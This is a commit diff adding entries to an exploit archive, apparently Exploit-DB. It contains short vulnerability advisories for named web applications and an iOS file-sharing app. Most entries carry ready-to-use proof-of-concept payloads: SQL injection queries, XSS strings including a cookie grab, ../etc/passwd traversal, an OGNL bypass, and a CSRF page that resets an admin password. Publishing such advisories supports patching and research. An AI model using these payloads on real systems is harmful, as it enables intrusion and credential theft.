Updated 03_30_2014

2014-03-30 04:31:18 +00:00 · 2014-03-30 04:31:18 +00:00 · a327467416
commit a327467416
parent 211b2f8394
20 changed files with 914 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -29324,3 +29324,22 @@ id,file,description,date,author,platform,type,port
 32559,platforms/hardware/webapps/32559.txt,"Easy FileManager 1.1 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
 32560,platforms/hardware/webapps/32560.txt,"ePhone Disk 1.0.2 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
 32561,platforms/php/webapps/32561.txt,"LinEx - Password Reset Vulnerability",2014-03-27,"N B Sri Harsha",php,webapps,80
+32562,platforms/php/webapps/32562.txt,"Joomla Kunena Component 3.0.4 - Persistent XSS",2014-03-27,Qoppa,php,webapps,80
+32563,platforms/php/webapps/32563.txt,"YourFreeWorld Downline Builder Pro 'id' Parameter SQL Injection Vulnerability",2008-11-02,"Hussin X",php,webapps,0
+32564,platforms/multiple/remote/32564.txt,"XWork 2.0.x 'ParameterInterceptor' Class OGNL Security Bypass Vulnerability",2008-11-04,"Meder Kydyraliev",multiple,remote,0
+32565,platforms/multiple/remote/32565.txt,"Struts <= 2.0.11 Multiple Directory Traversal Vulnerabilities",2008-11-04,"Csaba Barta",multiple,remote,0
+32566,platforms/php/webapps/32566.txt,"firmCHANNEL Indoor & Outdoor Digital Signage 3.24 Cross Site Scripting Vulnerability",2008-11-04,"Brad Antoniewicz",php,webapps,0
+32567,platforms/php/webapps/32567.txt,"DHCart 3.84 Multiple Cross Site Scripting And HTML Injection Vulnerabilities",2008-11-04,Lostmon,php,webapps,0
+32568,platforms/windows/remote/32568.rb,"Fitnesse Wiki Remote Command Execution Vulnerability",2014-03-28,"SecPod Research",windows,remote,80
+32569,platforms/hardware/webapps/32569.txt,"iStArtApp FileXChange 6.2 iOS - Multiple Vulnerabilities",2014-03-28,Vulnerability-Lab,hardware,webapps,8888
+32570,platforms/php/webapps/32570.txt,"CuteNews aj-fork 'path' Parameter Remote File Include Vulnerability",2008-11-06,DeltahackingTEAM,php,webapps,0
+32571,platforms/php/webapps/32571.txt,"TurnkeyForms Software Directory 1.0 SQL Injection and Cross Site Scripting Vulnerabilities",2008-11-07,G4N0K,php,webapps,0
+32572,platforms/windows/dos/32572.txt,"Anti-Trojan Elite 4.2.1 - Atepmon.sys IOCTL Request Local Overflow",2008-11-07,alex,windows,dos,0
+32573,platforms/windows/dos/32573.txt,"Microsoft Windows 2003/Vista - 'UnhookWindowsHookEx' Local Denial Of Service Vulnerability",2008-11-09,killprog.org,windows,dos,0
+32574,platforms/java/webapps/32574.txt,"MoinMoin 1.5.8/1.9 Cross-Site Scripting and Information Disclosure Vulnerabilities",2008-11-09,"Xia Shing Zee",java,webapps,0
+32575,platforms/php/webapps/32575.txt,"Zeeways SHAADICLONE 2.0 'admin/home.php' Authentication Bypass Vulnerability",2008-11-08,G4N0K,php,webapps,0
+32576,platforms/multiple/webapps/32576.txt,"IBM Tivoli Netcool Service Quality Manager Cross Site Scripting And HTML Injection Vulnerabilities",2008-11-10,"Francesco Bianchino",multiple,webapps,0
+32577,platforms/asp/webapps/32577.txt,"Dizi Portali 'film.asp' SQL Injection Vulnerability",2008-11-10,"Kaan KAMIS",asp,webapps,0
+32578,platforms/windows/remote/32578.py,"Yosemite Backup 8.70 'DtbClsLogin()' Remote Buffer Overflow Vulnerability",2008-11-11,"Abdul-Aziz Hariri",windows,remote,0
+32579,platforms/jsp/webapps/32579.html,"Sun Java System Identity Manager 6.0/7.x Multiple Vulnerabilities",2008-11-11,"Richard Brain",jsp,webapps,0
+32580,platforms/asp/webapps/32580.txt,"ASP-Nuke 2.0.7 - 'gotourl.asp' Open Redirect Vulnerability",2014-03-29,"felipe andrian",asp,webapps,0
--- a/platforms/asp/webapps/32577.txt
+++ b/platforms/asp/webapps/32577.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/32239/info
+
+Dizi Portali is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/film.asp?film=1+union+select+0,1,sifre,3,4,5+from+ayarlar 
--- a/platforms/asp/webapps/32580.txt
+++ b/platforms/asp/webapps/32580.txt
@ -0,0 +1,15 @@
+[+] ASP-Nuke 2.0.7 - Open Redirect Vulnerability in gotourl
+[+] Date: 28/03/2014
+[+] Risk: Low
+[+] Remote: Yes
+[+] Author: Felipe Andrian Peixoto
+[+] Vendor Homepage: http://www.aspnuke.it/
+[+] Contact: felipe_andrian@hotmail.com
+[+] Tested on: Windows 7 and Linux
+[+] Vulnerable File: gotourl.asp
+[+] Version: ASP-Nuke 2.0.7
+[+] Exploit : http://host/gotoURL.asp?url=[ Open Redirect Vul ]&id=43569 
+
+Note : An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. 
+This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.
+Reference :https://www.owasp.org/index.php/Open_redirect
--- a/platforms/hardware/webapps/32569.txt
+++ b/platforms/hardware/webapps/32569.txt
@ -0,0 +1,368 @@
+Document Title:
+===============
+iStArtApp FileXChange v6.2 iOS - Multiple Vulnerabilities
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1237
+
+
+Release Date:
+=============
+2014-03-26
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1237
+
+
+Common Vulnerability Scoring System:
+====================================
+7.4
+
+
+Product & Service Introduction:
+===============================
+FileXChange is a handy file manager for iPhone, iPod Touch and iPad. With FileXChange, you can share files with Mac, Windows, Linux and other iOS devices, 
+and use your iPhone, iPod Touch or iPad as a flash memory. With FileXChange, your iPhone, iPodTouch or iPad becomes a flash-memory drive. You can store files, 
+open them on your device or on any MAC or PC, wirelessly, using a simple internet browser.
+
+(Copy of the Homepage: https://itunes.apple.com/us/app/filexchange/id428955307 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered multiple high severity vulnerabilities in the official iStArtApp FileXChange v6.2 iOS mobile application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-03-26:	Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+iStArtApp
+Product: FileXChange - iOS Mobile Web Application 6.2
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+1.1
+A local file include web vulnerability has been discovered in the official iStArtApp FileXChange v6.2 iOS mobile web-application.
+A file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path 
+commands to compromise the web-application or mobile device.
+
+The web vulnerability is located in the `filename` value of the `Upload a File` module. Remote attackers are able to inject own files with 
+malicious `filename` value in the upload POST method request to compromise the mobile web-application. The attack vector is persistent and 
+the request method is POST. The local file/path include execution occcurs in the main index file dir list. The security risk of the local 
+file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.5(+)|(-)7.6.
+
+Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user account with 
+low user auth. Successful exploitation of the local file include web vulnerability results in mobile application or connected device 
+component compromise.
+
+Request Method(s):
+				[+] [POST]
+
+Vulnerable Module(s):
+				[+] Upload a File > Submit
+
+Vulnerable Parameter(s):
+				[+] filename
+
+Affected Module(s):
+				[+] Index File Dir List (http://localhost:8888/)
+
+
+
+1.2
+An arbitrary file upload web vulnerability has been discovered in the official iStArtApp FileXChange v6.2 iOS mobile web-application.
+The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
+
+The vulnerability is located in the `Upload a File` module. Remote attackers are able to upload a php or js web-shells by renaming the file with 
+multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension 
+`test.txt.html.php.js.aspx.txt`. After the upload the attacker needs to open the file with the path value in the web application. He deletes the 
+.txt file extension and can access the application with elevated executable access rights. The security risk of the arbitrary file upload web 
+vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.2(+)|(-)7.3.
+
+Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged application user account with password.
+Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
+
+Request Method(s):
+				[+] [POST]
+
+Vulnerable Module(s):
+				[+] Select File > Upload
+
+Vulnerable Parameter(s):
+				[+] filename (multiple extensions)
+
+Affected Module(s):
+				[+] Index File Dir List (http://localhost:8888/)
+
+
+
+1.3
+A local command/path injection web vulnerabilities has been discovered in the official iStArtApp FileXChange v6.2 iOS mobile web-application.
+A command inject vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
+
+The vulnerability is located in the vulnerable `devicename` value of the wifi fapplication. Local attackers are able to inject own malicious 
+system specific commands or path value requests via devicename value. The injection requires an active sync of the device information by new connections.
+The execution of the local command inject via devicename value on sync occurs in the header loction of all interface sites. The security risk of the local 
+command/path inject vulnerability is estimated as high(-) with a cvss (common vulnerability scoring system) count of 5.7(+)|(-)5.8.
+
+Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction. 
+Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to 
+compromise the mobile iOS application or the connected device components.
+
+Request Method(s):
+				[+] Sync
+
+Vulnerable Parameter(s):
+				[+] devicename
+
+Affected Module(s):
+				[+] Index File Dir List (http://localhost:8888/x)
+				[+] All Interface Header Sites (http://localhost:8888/)
+
+
+
+1.4
+A local command/path injection web vulnerabilities has been discovered in the official iStArtApp FileXChange v6.2 iOS mobile web-application.
+A command inject vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
+
+The vulnerability is located in the vulnerable `foldername` value of the wifi file dir list module. Local attackers are able to inject own malicious 
+system specific commands or path value requests in the vulnerable foldername value. The injection requires an active sync with the wifi app stored folders.
+The execution of the local command inject via foldername value on sync occurs in the file dir index list of the main upload path. The security risk of 
+the local command/path inject vulnerability is estimated as high(-) with a cvss (common vulnerability scoring system) count of 5.6(+)|(-)5.7.
+
+Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction. 
+Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to 
+compromise the mobile iOS application or the connected device components.
+
+Request Method(s):
+				[+] Sync
+
+Vulnerable Parameter(s):
+				[+] foldername (path value) 
+
+Affected Module(s):
+				[+] Index File Dir List (http://localhost:8888/)
+				[+] Sub Folder/Category File Dir List (http://localhost:8888/)
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The local file include web vulnerability can be exploited by local attacker without user interaction or privileged application user account.
+For security demonstration or to reproduce the local web vulnerability follow the provided information and steps below to continue.
+
+PoC: Filename [Index]
+
+<input name="chk1" type="checkbox"><img src="/tmp/trashCan.gif" align="absmiddle"> ...... 
+<img src="/tmp/image.gif" align="absmiddle"> <a href="<[./[LOCAL FILE INCLUDE VULNERABILITY!]>.png]">./[LOCAL FILE INCLUDE VULNERABILITY!]>.png.png</a>	-  0.5 Kb, 2014-03-24 12:01:44 <br />
+</p><h3>To upload a file, select it and then press 'Submit':</h3><h3><label><input type="file" name="InvioFile" 
+id="file" size="40"></label></h3><label><input type="submit" value="Submit" /></label><font size="2" color="white" </a font> <br /><br />
+To delete a file or a folder, select its checkbox and press 'Submit'<br />Please note that you are allowed to delete one file at a time.</form></body></html></iframe></a></div>
+
+
+--- PoC Session Logs [POST] ---
+Status: 200[OK]
+POST http://192.168.2.102:8888/Work/ Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Gr??e des Inhalts[1749] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[192.168.2.102:8888]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://192.168.2.102:8888/Work/]
+      Connection[keep-alive]
+   POST-Daten:
+      POST_DATA[-----------------------------26958314732313
+Content-Disposition: form-data; name="InvioFile"; filename="<./[LOCAL FILE INCLUDE VULNERABILITY!]>.png"
+Content-Type: image/png
+
+
+
+
+
+Status: 200[OK]
+GET http://192.168.2.102:8888/Work/./[LOCAL FILE INCLUDE VULNERABILITY!]>.png Load Flags[LOAD_DOCUMENT_URI  ] Gr??e des Inhalts[1750] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[192.168.2.102:8888]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://192.168.2.102:8888/Work/]
+      Connection[keep-alive]
+   Response Header:
+      Accept-Ranges[bytes]
+      Content-Length[1750]
+      Date[Mo., 24 M?r. 2014 12:01:46 GMT]
+
+
+
+
+1.2
+The arbitrary file upload web vulnerability can be exploited by remote attackers without userinteraction or privileged application user account.
+For security demonstration or to reproduce the local web vulnerability follow the provided information and steps below to continue.
+
+PoC: Filename [Index] (extensions|access)
+
+--- PoC Session Logs [POST] ---
+Status: 200[OK]
+POST http://192.168.2.102:8888/Work/ Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Gr??e des Inhalts[1749] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[192.168.2.102:8888]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://192.168.2.102:8888/Work/]
+      Connection[keep-alive]
+   POST-Daten:
+      POST_DATA[-----------------------------26958314732313
+Content-Disposition: form-data; name="InvioFile"; filename="test.png.html.php.js.aspx.png"
+Content-Type: image/png
+
+
+
+
+
+Status: 200[OK]
+GET http://192.168.2.102:8888/Work/./[LOCAL FILE INCLUDE VULNERABILITY!]>.png Load Flags[LOAD_DOCUMENT_URI  ] Gr??e des Inhalts[1750] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[192.168.2.102:8888]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://192.168.2.102:8888/Work/]
+      Connection[keep-alive]
+   Response Header:
+      Accept-Ranges[bytes]
+      Content-Length[1750]
+      Date[Mo., 24 M?r. 2014 12:01:46 GMT]
+
+
+
+
+
+
+1.3
+The local command injection web vulnerability can be exploited by local attackers with physical device access privileges and without user interaction.
+For security demonstration or to reproduce the local web vulnerability follow the provided information and steps below to continue.
+
+PoC: Devicename [Header Location]
+
+<div align="center"><a href="http://www.istartapp.com"><img src="/tmp/icon_75_stondata.gif" height="75" align="middel"> </a><h1>FileXChange</h1>
+<h2>Device: IPhone 360*¥337><"><iframe src="a"> - SW: Ver 6.2</h2><div align="left"><h3>/Work/</h3><form action="" method="post" 
+enctype="multipart/form-data" name="form1" id="form1"><p><div align="left"><h2><a href=".."><img src="/tmp/folder_up.gif" height="40" align="absbottom"/></a></h2>
+
+
+1.4
+The local command injection web vulnerability can be exploited by local attackers with physical device access privileges and without user interaction.
+For security demonstration or to reproduce the local web vulnerability follow the provided information and steps below to continue.
+
+PoC: Foldername CHK
+
+ <a href="><"><./[LOCAL COMMAND INJECT VIA FOLDERNAME VALUE CHK]>/</a>		-      0.1 Kb, 2014-03-23 14:31:29 <br />
+<input type="checkbox" name="chk1" /><img src="/tmp/trashCan.gif"align="absmiddle"/> ...... <img src="tmp/folder.gif"align="absbottom"/> 
+<a href="Pictures/">Pictures/</a>		-      0.1 Kb, 2014-03-23 14:31:29 <br />
+<input type="checkbox" name="chk2" /><img src="/tmp/trashCan.gif"align="absmiddle"/> ...... <img src="tmp/folder.gif"align="absbottom"/> 
+<a href="Work/">Work/</a>		-      0.1 Kb, 2014-03-24 11:58:33 <br />
+</p><h3>To upload a file, select it and then press 'Submit':</h3><h3><label><input type="file" name="InvioFile" id="file" size="40"></label></h3>
+<label><input type="submit" value="Submit" /></label><font size="2" color="white" </a font> <br /><br />To delete a file or a folder, 
+select its checkbox and press 'Submit'<br />Please note that you are allowed to delete one file at a time.</form></body></html></iframe>
+
+
+Solution - Fix & Patch:
+=======================
+1.1
+The file include web vulnerability can be patched by a secure parse of the filename value in the POST method upload request.
+Parse also the vulnerable index output listing with the filename value to prevent further execution of injected file requests or path values.
+
+1.2
+The arbitrary file upload web vulnerability can be patched by a secure encode and filter restriction of the filename value.
+Disallow multiple extensions of files, encode and parse the filename again.
+
+1.3
+The local command injection web vulnerability can be patched by a secure parse and encode of the vulnerable device name info value.
+Encode the sync input of the device name and setup a own secure classe to encode all output of device information values.
+
+
+1.4
+Parse and encode the foldername value in the add via sync POST method request. Prepare to encode and filter also the foldername oputput listing in the index- or sub-dir.
+
+
+Security Risk:
+==============
+1.1
+The security risk of the local file include web vulnerability is estimated as critical.
+
+1.2
+The security risk of the arbitrary file upload web vulnerability is estimated as high.
+
+1.3
+The security risk of the first command inject web vulnerability in the device name value  is estimated as high(-).
+
+1.4
+The security risk of the second command inject web vulnerability in the folder/path value via sync is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
+Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
+profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
+states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
+may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
+or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       - admin@evolution-sec.com
+Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
+other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
+modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
+
+
+
+-- 
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
--- a/platforms/java/webapps/32574.txt
+++ b/platforms/java/webapps/32574.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32208/info
+
+MoinMoin is prone to cross-site scripting and information-disclosure vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials or other sensitive information and to launch other attacks.
+
+MoinMoin 1.5.9 and 1.8.0 are vulnerable; other versions may also be affected.
+
+http://www.example.com/%08?action=fullsearch&value=linkto%3A%22%08%22&context=180 http://www.example.com/VulnVulnVulnVuln/VulnVulnVuln/Vul.........
--- a/platforms/jsp/webapps/32579.html
+++ b/platforms/jsp/webapps/32579.html
@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/32262/info
+
+
+Sun Java System Identity Manager is prone to multiple web-interface vulnerabilities, including a cross-site request-forgery issue, multiple cross-site scripting issues, multiple HTML-injection issues, and a directory-traversal vulnerability.
+
+Successful exploits of many of these issues will allow an attacker to completely compromise the affected application.
+
+These issues affect the following versions:
+
+Sun Java System Identity Manager 6.0
+Sun Java System Identity Manager 6.0 SP1
+Sun Java System Identity Manager 6.0 SP2
+Sun Java System Identity Manager 6.0 SP3
+Sun Java System Identity Manager 6.0 SP4
+Sun Java System Identity Manager 7.0
+Sun Java System Identity Manager 7.1 
+
+<html> <h1>CSRF attack demo - changes administrative password to 'Password19'</h1> <script> var img = new Image(); img.src = 'https://target.tld/idm/admin/changeself.jsp?id=&command=Save&activeControl=&resourceAccounts.password=Password19&resourceAccounts.confirmPassword=Passwo rd19&resourceAccounts.currentResourceAccounts%5BLighthouse%5D.selected=true'; </script> </html> 
--- a/platforms/multiple/remote/32564.txt
+++ b/platforms/multiple/remote/32564.txt
@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/32101/info
+
+XWork is prone to a security-bypass vulnerability because it fails to adequately handle user-supplied input.
+
+Attackers can exploit this issue to manipulate server-side context objects with the privileges of the user running the application. Successful exploits can compromise the application and possibly the underlying computer.
+
+Versions prior to XWork 2.0.6 are vulnerable. Struts 2.0.0 through 2.0.11.2 contain vulnerable versions of XWorks and are therefore also affected. 
+
+To set #session.user to '0wn3d':
+
+('\u0023' + 'session[\'user\']')(unused)=0wn3d 
--- a/platforms/multiple/remote/32565.txt
+++ b/platforms/multiple/remote/32565.txt
@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/32104/info
+
+Struts is prone to multiple directory-traversal vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit these issues using directory-traversal strings ('../') to download arbitrary files with the privileges of the webserver process. Information obtained may aid in further attacks.
+
+Versions prior to Struts 2.0.12 are vulnerable. 
+
+http://www.example.com:8080/struts2-blank-2.0.11.1/struts..
+http://www.example.com:8080/struts2-blank-2.0.11.1/struts/..%252f
+http://www.example.com:8080/struts2-blank-2.0.11.1/struts/..%252f..%252f..%252fWEB-INF/classess/example/Log\in.class/ 
--- a/platforms/multiple/webapps/32576.txt
+++ b/platforms/multiple/webapps/32576.txt
@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/32233/info
+
+IBM Tivoli Netcool Service Quality Manager is prone to multiple cross-site scripting and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+We don't know which versions of IBM Tivoli Netcool Service Quality Manager are affected. We will update this BID when more details emerge.
+
+NOTE: IBM Tivoli Netcool Service Quality Manager may also have been known as 'Vallent Metrica Service Assurance'. 
+
+http://www.example.com/<document root>/ReportTree?action=generatedreportresults&elementid="><SCRIPT>alert("Non persistant XSS");</SCRIPT><!--&date=0000000000000 http://www.example.com/<document root>/Launch?jnlpname=="><SCRIPT>alert("Non Persistant XSS");</SCRIPT> http://www.example.com/<document_root>/ReportRequest?dateformat=dd%2FMM%2Fyyyy&reporttitle=some_title&reportID=some_stuff&version=0&treesrc=&treetitle=&p_wstring=&p_dataperiod =none%3A%23%3Araw&startdate=01%2F01%2F2008&reporttype=offline&%3Atasklabel=<SCRIPT>alert(Persistant XSS!);</SCRIPT>&none_agg_specified=false&windowtype=main 
--- a/platforms/php/webapps/32562.txt
+++ b/platforms/php/webapps/32562.txt
@ -0,0 +1,34 @@
+Persistent XSS in Joomla::Kunena 3.0.4
+26. February 2014
+by Qoppa
+
+++ Description
+
+"Kunena is the leading Joomla forum component. Downloaded more than 3,750,000 times in nearly 6 years."
+
+Kunena is written in PHP. Users can post a Google Map using the following BBCode
+	[map]content[/map]
+
+Kunena creates a JavaScript based on input, but doesn't decode it correctly.
+
+
+++ Analysis
+
+Vulnerable function in \bbcode\bbcode.php (lines 1049-1116)
+
+1049	function DoMap($bbcode, $action, $name, $default, $params, $content) {
+	...
+1078	$document->addScriptDeclaration("
+1079	// <![CDATA[
+	...
+1097	var contentString = '<p><strong>".JText::_('COM_KUNENA_GOOGLE_MAP_NO_GEOCODE', true)." <i>".json_encode($content)."</i></strong></p>';
+	...
+1112	// ]]>"
+1113	);
+
+Single quotes remain untouched in $content, so it's possible to break out of encapsulation.
+
+
+++ PoC Exploit
+
+[map]'}});}});alert('XSS');(function(){{(function(){{var v='[/map]
--- a/platforms/php/webapps/32563.txt
+++ b/platforms/php/webapps/32563.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/32047/info
+
+Downline Builder Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13-- 
--- a/platforms/php/webapps/32566.txt
+++ b/platforms/php/webapps/32566.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32107/info
+
+firmCHANNEL Indoor & Outdoor Digital SIGNAGE is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+firmCHANNEL Indoor & Outdoor Digital SIGNAGE 3.24 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?module=account&action=login%3Cscript%3Ealert(%27xss%27);%3C/script%3E 
--- a/platforms/php/webapps/32567.txt
+++ b/platforms/php/webapps/32567.txt
@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/32117/info
+
+DHCart is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+DHCart 3.84 is vulnerable; other versions may also be affected.
+
+http://www.example.com/order.php?dhaction=check&submit_domain=Register&domain=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&ext1=on
+
+http://www.example.com/order.php?dhaction=add&d1=lalalalasss%22%3E%3Cscript%3Ealert(1)%3C/script%3E&x1=.com&r1=0&h1=1&addtocart1=on&n=3
+
--- a/platforms/php/webapps/32570.txt
+++ b/platforms/php/webapps/32570.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32141/info
+
+CuteNews aj-fork is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
+
+CuteNews aj-fork 167 final is vulnerable; other versions may also be affected. 
+
+http://www.example.com/register.php?config_skin=../../../../etc/passwd%00 
--- a/platforms/php/webapps/32571.txt
+++ b/platforms/php/webapps/32571.txt
@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/32175/info
+
+TurnkeyForms Software Directory is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Software Directory 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/showcategory.php?cid=-24/**/UNION/**/ALL/**/SELECT/**/1,concat(version(),0x3a,user()),3,4,5--
+http://www.example.com/signinform.php?msg="><script>alert(document.cookie)</script> 
--- a/platforms/php/webapps/32575.txt
+++ b/platforms/php/webapps/32575.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32222/info
+
+Zeeways SHAADICLONE is prone to an authentication-bypass vulnerability.
+
+Attackers can exploit this issue to gain administrative access to the affected application.
+
+SHAADICLONE 2.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/admin/home.php 
--- a/platforms/windows/dos/32572.txt
+++ b/platforms/windows/dos/32572.txt
@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/32202/info
+
+ISecSoft Anti-Trojan Elite and Anti-Keylogger Elite are prone to multiple local privilege-escalation vulnerabilities.
+
+An attacker can exploit these issues to execute arbitrary code with elevated privileges, which may facilitate a complete compromise of the affected computer.
+
+The following applications are vulnerable:
+
+Anti-Trojan Elite 4.2.1 and earlier
+Anti-Keylogger Elite 3.3.0 and earlier
+
+http://www.exploit-db.com/sploits/32572-1.zip
+http://www.exploit-db.com/sploits/32572-2.zip
--- a/platforms/windows/dos/32573.txt
+++ b/platforms/windows/dos/32573.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32206/info
+
+Microsoft Windows is prone to a local denial-of-service vulnerability.
+
